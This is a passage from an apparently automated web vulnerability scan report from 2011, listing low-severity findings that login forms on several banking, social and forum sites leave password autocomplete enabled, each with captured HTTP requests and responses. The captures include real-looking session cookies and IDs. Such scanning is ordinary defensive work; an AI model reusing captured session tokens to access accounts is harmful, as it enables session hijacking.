Connection: close
Set-Cookie: BIGipServerwww.bizpayment.ktb.co.th_ext=2925265162.47873.0000; path=/


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<td width = "800">


<form id="loginForm" method="post" action="/epayview/login.do;jsessionid=N16N74kl8KmPjvQjKWXLGtGgG2SbBbqGGhm3rQgrkGPLvbQYVzJQ!1246557006"><div>
...[SNIP]...
<br>
<input type="password" name="password" maxlength="30" size="30" value="" class="value" />&nbsp;*
                   &nbsp; &nbsp; <br>
...[SNIP]...

17.18. http://www.controlcase.com/change_password.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.controlcase.com
Path:   /change_password.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /change_password.php HTTP/1.1
Host: www.controlcase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.controlcase.com/logon_page.php
Cookie: __utma=208121856.1545234492.1303665078.1303665078.1304448138.2; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.456c=244604216c6eb329.1304448138.1.1304448224.1304448138; _pk_ses.3.456c=*; __utmb=208121856.5.10.1304448138; __utmc=208121856; PHPSESSID=22b25ef82ae4b97a809b48be70fe26dc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:48:39 GMT
Server: Apache/2.0.55 (Win32)
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</legend>
<form name="change_passwd" method='post' action='change_password.php' onSubmit="javascript:document.change_passwd.todo.value='change'">
<input type="hidden" name="PW" value="0" />
...[SNIP]...
<td><input name="password" type="password" id="PW__pass" size="50" /></td>
...[SNIP]...
<td><input name="new_password" type="password" id="PW__pass_new" size="50" /></td>
...[SNIP]...
<td><input name="confirm_password" type="password" id="PW__pass_confirm" size="50" /></td>
...[SNIP]...

17.19. http://www.controlcase.com/logon_page.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.controlcase.com
Path:   /logon_page.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /logon_page.php HTTP/1.1
Host: www.controlcase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.controlcase.com/logon_page.php
Cookie: __utma=208121856.1545234492.1303665078.1303665078.1304448138.2; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.3.456c=244604216c6eb329.1304448138.1.1304448228.1304448138; _pk_ses.3.456c=*; __utmb=208121856.6.10.1304448138; __utmc=208121856; PHPSESSID=22b25ef82ae4b97a809b48be70fe26dc

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:55 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</legend>
<form method='post' action='process_form_PW.php' name="login_frm">
<input type="hidden" name="PW" value="0" />
...[SNIP]...
<td><input name="password" type="password" id="PW__pass" size="50" /></td>
...[SNIP]...

17.20. http://www.facebook.com/pages/KTB-Care/178373518915  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/KTB-Care/178373518915

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pages/KTB-Care/178373518915 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=z8-YA; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.171.104
Connection: close
Date: Tue, 03 May 2011 13:34:01 GMT
Content-Length: 239760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

17.21. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:TmWaTfgWKfL150HA_TIl_THIIojbAg:DlLS6wTurRAvdZuM;Path=/accounts;Expires=Thu, 02-May-2013 13:35:40 GMT;Secure;HttpOnly
Set-Cookie: GALX=DVEOfIYoscA;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Tue, 03 May 2011 13:35:40 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10951
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

17.22. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:3xRNw51itG1YLFtl57J79ZLZ2oGmkQ:CweGJnEhEGG2esDX;Path=/accounts;Expires=Thu, 02-May-2013 13:35:35 GMT;Secure;HttpOnly
Set-Cookie: GALX=tN93GGEDnMc;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Tue, 03 May 2011 13:35:35 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10953
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

17.23. http://www.khonkaen.com/english/forum/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.khonkaen.com
Path:   /english/forum/default.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /english/forum/default.asp HTTP/1.1
Host: www.khonkaen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:35:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 56230
Content-Type: text/html
Expires: Sun, 01 May 2011 13:35:08 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D05%2D03+09%3A35%3A08; expires=Thu, 03-May-2012 13:35:08 GMT; path=/english/forum/
Set-Cookie: WWF9sID=SID=f164d34f8z5551bee8bz1c9f5zddd61d; path=/english/forum/
Set-Cookie: ASPSESSIONIDAADRARSA=HLEDHHGDIEGBPGHDMNPDLMJJ; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" tabindex="1" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" tabindex="2" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

17.24. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ktamsmarttrade.com
Path:   /FrontWeb/Home/Login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /FrontWeb/Home/Login.aspx HTTP/1.1
Host: www.ktamsmarttrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:53:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qa1lw355wgkcza550r3dx2z4; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=windows-874
Content-Length: 40275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link href="../../App_Th
...[SNIP]...
<body onkeypress="return (window.event.keyCode!=13);" style="background-color: #adcfe8;">
<form name="aspnetForm" method="post" action="Login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td valign="top" style="width: 160px">
<input name="ctl00$cphMain$txtPassword" type="password" maxlength="4" id="ctl00_cphMain_txtPassword" tabindex="2" class="InputIntNumber" onkeydown="DefaultEnter();" style="width:160px;" /></td>
...[SNIP]...

17.25. http://www.newsroom.barclays.com/webuser/newsextra.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /webuser/newsextra.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /webuser/newsextra.aspx HTTP/1.1
Host: www.newsroom.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2wxxy2n3jbvq02h4rhinjrs4; __switchTo5x=68; __unam=2099162-12fb6735ea2-70159163-3; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454139565:ss=1304454046661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:50 GMT
Content-Length: 68261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<body>
   <form name="aspnetForm" method="post" action="newsextra.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" cssclass="globalForm">
<div>
...[SNIP]...
<div class="newsExtraInput" >
            <input name="ctl00$body$ctl00$loginControl$txtPasswordNewsExtra" type="password" id="ctl00_body_ctl00_loginControl_txtPasswordNewsExtra" tabindex="2" class="password loginfields" onblur="TextInsideOnBlur(this,&#39;Password&#39;)" onfocus="TextInsideOnFocus(this, &#39;Password&#39;)" /><span id="ctl00_body_ctl00_loginControl_rfvPassword" style="color:Red;display:none;">
...[SNIP]...

17.26. http://www.newsroom.barclays.com/webuser/register.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /webuser/register.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /webuser/register.aspx HTTP/1.1
Host: www.newsroom.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2wxxy2n3jbvq02h4rhinjrs4; __switchTo5x=68; __unam=2099162-12fb6735ea2-70159163-3; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454139565:ss=1304454046661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:46 GMT
Content-Length: 127697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<body>
   <form name="aspnetForm" method="post" action="register.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm" cssclass="globalForm">
<div>
...[SNIP]...
<div class="newsExtraInput">
               <input name="ctl00$body$ctl00$txtPassword" type="password" maxlength="20" id="ctl00_body_ctl00_txtPassword" size="20" /><span id="ctl00_body_ctl00_RequiredFieldValidator1" title="Please enter a value for Password: (over 6 characters)" style="color:Red;visibility:hidden;">
...[SNIP]...

17.27. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cs70_banking/logon/sbuser HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.scbbusinessnet.com/

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:08 GMT
Server: IBM_HTTP_Server
Expires: 0
Set-Cookie: JSESSIONID=0000eYJXX4lFMzPC4DgxJ5qN74X:vd1tbof0;Path=/; Secure
Set-Cookie: affiliate=defaultAffiliate;Expires=Sun, 21-May-2079 15:58:16 GMT;Path=/cs70_banking
Cache-Control: no-store
Age: 3 Jun 2011 12:44:09 GMT
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 11710


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
</script>
<form name="sbLogonForm" method="POST" action="/cs70_banking/logon/sbuser">
<input type="hidden" name="a" value="">
...[SNIP]...
<td> <input type="password" name="j_password" maxlength="32" size="20" value="" class="box"> </td>
...[SNIP]...

17.28. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/download

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cs70_banking/logon/sbuser/download HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:47 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 15447


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
</script>
<form name="sbLogonForm" method="POST" action="/cs70_banking/logon/sbuser">
<input type="hidden" name="a" value="">
...[SNIP]...
<td> <input type="password" name="j_password" maxlength="32" size="20" value="" class="box"> </td>
...[SNIP]...

17.29. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/information

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cs70_banking/logon/sbuser/information HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:48 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 14996


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
</script>
<form name="sbLogonForm" method="POST" action="/cs70_banking/logon/sbuser">
<input type="hidden" name="a" value="">
...[SNIP]...
<td> <input type="password" name="j_password" maxlength="32" size="20" value="" class="box"> </td>
...[SNIP]...

17.30. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/logon_th

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cs70_banking/logon/sbuser/logon_th HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:50 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:50 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 11786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
</script>
<form name="sbLogonForm" method="POST" action="/cs70_banking/logon/sbuser">
<input type="hidden" name="a" value="">
...[SNIP]...
<td> <input type="password" name="j_password" maxlength="32" size="20" value="" class="box"> </td>
...[SNIP]...

17.31. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/logon/sbuser/securetip

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cs70_banking/logon/sbuser/securetip HTTP/1.1
Host: www.scbbusinessnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:52 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd
Expires: 0
Cache-Control: no-store
Age: 3 Jun 2011 12:53:58 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=WINDOWS-874
Content-Language: en-IE
Content-Length: 15786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html lang="en">
<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-trans
...[SNIP]...
</script>
<form name="sbLogonForm" method="POST" action="/cs70_banking/logon/sbuser">
<input type="hidden" name="a" value="">
...[SNIP]...
<td> <input type="password" name="j_password" maxlength="32" size="20" value="" class="box"> </td>
...[SNIP]...

17.32. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
<td class="windowbg2" valign="middle">
                       <form action="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=login2" method="post" accept-charset="TIS-620" style="margin: 0;">
                           <table border="0" cellpadding="2" cellspacing="0" align="center" width="100%">
...[SNIP]...
<br />
                                   <input type="password" name="passwrd" id="passwrd" size="15" /></label>
...[SNIP]...

17.33. http://www.thailandhotelforums.com/forum/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thailandhotelforums.com
Path:   /forum/index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /forum/index.php HTTP/1.1
Host: www.thailandhotelforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:08 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=5jdee9v5utii7ouils1v34hfm1; path=/; domain=.thailandhotelforums.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 13:34:08 GMT
Connection: close
Content-Type: text/html; charset=TIS-620
Content-Length: 47754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <meta http-equiv="Content-T
...[SNIP]...
</script>

                               <form action="http://www.thailandhotelforums.com/forum/index.php?PHPSESSID=5jdee9v5utii7ouils1v34hfm1&amp;action=login2" method="post" accept-charset="TIS-620" class="middletext" style="margin: 3px 1ex 1px 0;" onsubmit="hashLoginPassword(this, 'f659db5a40e8c19cc022cfaaaa4c80b7');">
                                   <input type="text" name="user" size="10" /> <input type="password" name="passwrd" size="10" />
                                   <select name="cookielength">
...[SNIP]...

17.34. http://www.yestheyrefake.net/vb/forumdisplay.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yestheyrefake.net
Path:   /vb/forumdisplay.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /vb/forumdisplay.php HTTP/1.1
Host: www.yestheyrefake.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:34 GMT
Server: Apache
Cache-Control: private
Pragma: private
X-Powered-By: PHP/4.4.9
X-UA-Compatible: IE=7
